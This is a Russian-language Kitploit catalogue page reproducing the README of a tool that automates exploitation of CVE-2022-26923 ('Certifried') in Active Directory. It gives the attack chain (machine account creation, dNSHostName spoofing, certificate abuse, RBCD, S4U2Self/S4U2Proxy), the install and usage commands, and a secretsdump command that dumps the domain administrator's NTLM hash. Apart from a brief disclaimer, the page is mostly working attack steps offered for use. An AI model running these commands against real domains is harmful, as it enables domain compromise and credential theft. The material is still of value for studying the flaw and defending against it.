Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-26923 — Exploitation de CVE-2022-26923 | Kitploit
Инструменты/GitHubGitHub/eliasdekiniweek/cve-2022-26923
Privilege EscalationVulnerability AnalysisExploitationLateral MovementPost-ExploitationPenetration TestingAuthenticationLearning & EducationRed Teaming
GitHubeliasdekiniweek/cve-2022-26923

CVE-2022-26923

Exploitation de CVE-2022-26923

16 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

CVE-2022-26923 – Exploit Certifried (AD CS Abuse)

Автоматизация эксплуатации CVE-2022-26923 (Certifried), позволяющая повышение привилегий через злоупотребление службами Active Directory Certificate Services (AD CS) и Resource-Based Constrained Delegation (RBCD), приводящая к дампу NTLM-хэша учётной записи администратора домена.

⚠️ Только в образовательных целях / Lab / HTB

Не использовать в несанкционированных средах.


🎯 Описание

Этот скрипт автоматизирует следующую цепочку атаки:

  1. Создание контролируемой учётной записи компьютера
  2. Изменение dNSHostName
  3. Запрос сертификата через AD CS
  4. Аутентификация по сертификату
  5. Злоупотребление RBCD
  6. S4U2Self + S4U2Proxy
  7. Получение билета Kerberos для administrator
  8. Дамп NTLM через secretsdump.py

🔗 Уязвимость

  • CVE-2022-26923 – «Certifried»
  • Затрагивает среды Active Directory, использующие AD CS
  • Позволяет выдавать себя за Domain Controller с помощью некорректно выданного сертификата

🛠 Используемые инструменты

  • certipy-ad
  • bloodyAD
  • getST.py (Impacket)
  • secretsdump.py (Impacket)
  • openssl

📦 Установка зависимостей

root@kitploit:~
pipx install impacket
pipx install certipy-ad
pipx install bloodyad
sudo apt install openssl

🚀 Использование

root@kitploit:~
chmod +x CVE-2022-26923.sh
./CVE-2022-26923.sh [options]

Доступные опции

root@kitploit:~
-d, --dc-ip          IP-адрес Domain Controller
-D, --domain         Имя домена
-u, --user           Действительный пользователь
-p, --pass           Пароль пользователя
-c, --comp-name      Имя контролируемого компьютера
-C, --comp-pass      Пароль компьютера
-a, --ca-name        Имя Certificate Authority
-t, --template       Шаблон сертификата
-f, --pfx-file       Имя файла PFX
-H, --dc-hostname    Имя хоста DC
-A, --dc-account     Учётная запись DC
-i, --impersonate    Целевая учётная запись для имперсонации
--verbose            Режим отладки
-h, --help           Справка

🧠 Пример (HTB Certified)

root@kitploit:~
./CVE-2022-26923.sh \
-d 10.129.1.39 \
-D certifried.htb \
-u [email protected] \
-p 'Ch4ng3m3!' \
--verbose

🔥 Ожидаемый результат

По завершении выполнения:

  • Билет Kerberos administrator.ccache
  • Дамп NTLM учётной записи administrator

При проблемах с Kerberos:

root@kitploit:~
KRB5CCNAME=/tmp/administrator.ccache secretsdump.py \
-just-dc-ntlm -just-dc-user administrator \
certifried.htb/[email protected] \
-k -no-pass -dc-ip 10.129.1.39

🧬 Внутреннее устройство

root@kitploit:~
Machine Account Creation
        ↓
dNSHostName spoofing
        ↓
Certificate Request (Machine Template)
        ↓
Authentication via PFX
        ↓
RBCD abuse (bloodyAD)
        ↓
S4U2Self + S4U2Proxy
        ↓
Kerberos Ticket extraction
        ↓
NTLM dump via secretsdump

⚠️ Дисклеймер

Этот проект предоставляется в целях:

  • образовательных
  • исследований в области безопасности
  • личной лаборатории
  • CTF / HTB

Автор снимает с себя всякую ответственность в случае несанкционированного использования.


📜 Лицензия

MIT

Скачать инструмент